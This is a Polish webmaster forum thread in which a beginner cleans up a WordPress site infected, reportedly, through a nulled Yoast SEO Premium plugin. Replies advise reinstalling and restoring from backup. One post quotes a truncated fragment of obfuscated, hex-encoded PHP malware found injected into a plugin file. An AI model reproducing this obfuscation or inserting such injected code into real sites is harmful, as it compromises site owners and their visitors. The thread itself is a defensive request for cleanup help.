Polecane posty

Już wiem od supportu ze atak poszedł przez plugin yoast seo premium,  bo cos z nim było nie tak, więc go skasuje i zostawie podstawową wersję. Ale czy nadpisanie wp naprawi wszystkie zainfekowane pliki? bo dostalem odpowiedź ze raczej nie

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Nie naprawi, przecież jak się ktoś włamuje do skryptu, to trzeba go wyczyścić i postawić na nowo lub przywrócić z backupu, kiedy pliki były czyste. Możesz się bawić w nadpisywanie i mozolne szukanie, ale nie ma bata, żebyś znalazł wszystkie zainfekowane pliki ze 100% pewnością - zawsze będzie mniejsze lub większe ryzyko, że coś przeoczyłeś i problem wróci ze zdwojoną siłą.

 

A pluginy do WP w wersji nulled są praktycznie wszystkie z doklejkami.


"Szaleństwem jest chodzenie po ulicy z połówką melona na głowie i powtarzanie: Jestem chomikiem"

Dick Steele, Agent WD-40 [*]

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Napisano (edytowany)

Jeśli nie robiłem backupów, bo to w sumie moja pierwsza strona więc nie pomyślałem o tym nawet zeby je robić, nie wiedzialem ze jest w ogole taka opcja.
To co teraz mam zrobić? jedyne rozwiązanie to skasować wszystko i postawić na nowo ? I moje artykuły, zdjęcia, poformowane kategorie i całą reszta przepadnie tak ?

 

Edit:
A Czy np przeniesienie plików do katalogu /stare (tylko ktore pliki, z bazy danych czy te z polaczenia ftp?) , zainstalowanie nowego wp i wgranie wtyczek jakichs od antywirusa jednej lub kilku dla lepszego efektu i przeskanowanie wszystkiego miało by sens ?

Edytowano przez Blasterm92
żeby nie robic double posta

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

1) To co masz czyli calu zasyfiały WP razem z plikami i bazą przenieś na jakiś inne konto z zablokowanym dostępem na ALL IP z wyjątkiem twojego. I odpal by działało > bodziesz miął działający backup

Samą bazę skopiuj jeszcze dodatkowa do innej nowej bazy

 

2)  Postaw nową instalację WP w wersji podstawowej  bez tych wtyczek;

3)  Jak uruchomisz nową instancje w configu podepnij starą (nowa kopia) bazy jeśli WP odpali, to zostanie przeniesienie grafik.

 

 

 

 


HTTP 200 usługi IT - Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Node.js / MySQL :chatownik:

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Witam, zrobiłem tak:
Zainstalowałem od nowa nowego wp z nową bazą danych, usunałem tą wtyczke yoast seo premium, przekopiowałem starą bazę danych do nowej i wszystko działa, zarzuciłem skan wordfencem ale skanuje minute a potem wyrzuca błąd jakiś że była aktualizacja 5 minut temu i trzeba od nowa włączyć scan, i tak jest za każdym razem, ale znalazło około 30 plików które skasowałem.

Tam jest 10 takich pól które się odznaczają jak scan przejdzie, to u mnie jest tylko server state i file changes zaznaczone a 3 nastepne się kręca i sie nic nie dzieje.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
1 godzinę temu, Blasterm92 napisał:

Witam, zrobiłem tak:

Dziękujemy za informacje  :hi:


HTTP 200 usługi IT - Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Node.js / MySQL :chatownik:

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Dzięki za pomoc, co prawda Mion jesteś trochę złośliwy dla zielonych w temacie uzytkownikow ale dałem radę.

  • Haha 1

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Napisano (edytowany)

Witam, mam niestety kolejny problem.

Parse error: syntax error, unexpected '$c182d94' (T_VARIABLE) in /home/everygam/domains/xxx.com.pl/public_html/wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-provider.php on line 1

Czy to moze byc spowodowane tym ze przekroczyłem ponad 500 stron w sitemap ?

Edytowano przez Blasterm92

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

masz jakiś syf w tym pliku według mnie.
sitemapy ma ograniczenia ale nie takie małe.

 


dymna.jpg

Przyjaźń psa na całe życie. ZAGINĄŁ DOM

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
W dniu 5.02.2018 o 15:56, Blasterm92 napisał:

co prawda Mion jesteś trochę złośliwy

 

3 godziny temu, Blasterm92 napisał:

Czy to moze byc spowodowane tym ze przekroczyłem ponad 500 stron w sitemap ?

Za każdym razem będziesz pisał na forum o Twoich problemach z WP ?


HTTP 200 usługi IT - Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Node.js / MySQL :chatownik:

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Chyba od tego jest forum ?
Może dla ciebie (z malej) to tylko forma reklamy ale dla mnie to tez otrzymanie pomocy bo to co znalazlem w google u mnie nie zadzialalo

 

Nie wiem jakie moge mieć zyfy w tym pliku, on utworzył się automatycznie, ja w nim nic nie zmieniałem

 

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
5 minut temu, Blasterm92 napisał:

Parse error: syntax error, unexpected  Chyba od tego jest forum ?

Przejrzyj komunikaty błędów i logi serwera , znajdź błąd i go wyeliminuj.

 

6 minut temu, Blasterm92 napisał:

Nie wiem jakie moge mieć zyfy w tym pliku, on utworzył się automatycznie, ja w nim nic nie zmieniałem

No widzisz, a jednak.

Instalujesz co popadnie to masz błędy. Kod źródłowy jest otwarty możesz dowolnie analizować:

https://github.com/GSA/wordpress-seo/tree/master/inc/sitemaps

 


HTTP 200 usługi IT - Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Node.js / MySQL :chatownik:

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Prawdopodobnie po poprzednim ataku moja strona nie została do końca wyczyszczona z wirusów, jak sie okazało w pliku tym były z 20 linijek jakiegoś kodu typu:

 

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $k00bcc5 = 453;$GLOBALS['s0b788ba']=Array();global$s0b788ba;$s0b788ba=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['df0337']="\x21\x79\x66\x6e\x53\x32\x46\x2e\x25\x30\x44\x31\x78\x4b\x43\x7d\x38\x4a\x27\x3f\x5b\x26\x5d\x2c\xa\x3e\x70\x72\xd\x60\x4d\x63\x41\x4c\x2a\x6f\x5a\x50\x9\x7a\x73\x3a\x22\x59\x3d\x23\x2f\x76\x7b\x52\x7c\x56\x29\x6c\x2d\x61\x2b\x74\x65\x54\x3c\x6d\x42\x5e\x4f\x28\x69\x36\x67\x75\x6a\x77\x39\x64\x7e\x62\x51\x57\x45\x47\x49\x34\x5f\x5c\x58\x68\x33\x48\x6b\x55\x37\x24\x35\x4e\x40\x20\x3b\x71";$s0b788ba[$s0b788ba['df0337'][61].$s0b788ba['df0337'][92].$s0b788ba['df0337'][55].$s0b788ba['df0337'][92].$s0b788ba

 

A to tylko 1/10 wszystkiego, gdy skasowałem i zostawiłem oryginalny to ruszyło i wszystko śmiga, tylko problem w tym że jak mam wyszukać i skasować pozostałe wirusy na stronie? gdy odpalam wordfence to skanuje 5 minut i sie wylacza a zeskanowana jest moze 1/3

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Tego typu kwiatki

66\x6e\x53\x32\x46\x2e\x25\x30\x44\x31\x78\x4b\x43\x7d\x38\x4a\x

zaobfuskowanym < obfuskacja  nie wiem jak to odmienić >   złośliwym kodem PHP. Dlatego jak SYSYF będziesz powtarzał do punktu wyjścia jeśli nie podejmiesz radykalnych kroków.  A jakich to wiadomo ;)


HTTP 200 usługi IT - Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Node.js / MySQL :chatownik:

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Napisano (edytowany)

Nie wystarczy wszystkich plików wyczyścić?

Znajduje kolejne pliki w których są komendy zaspamowane typu .$GLOBALS['4324'] itp

Edytowano przez Blasterm92

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się

  • Kto przegląda   0 użytkowników

    Brak zalogowanych użytkowników przeglądających tę stronę.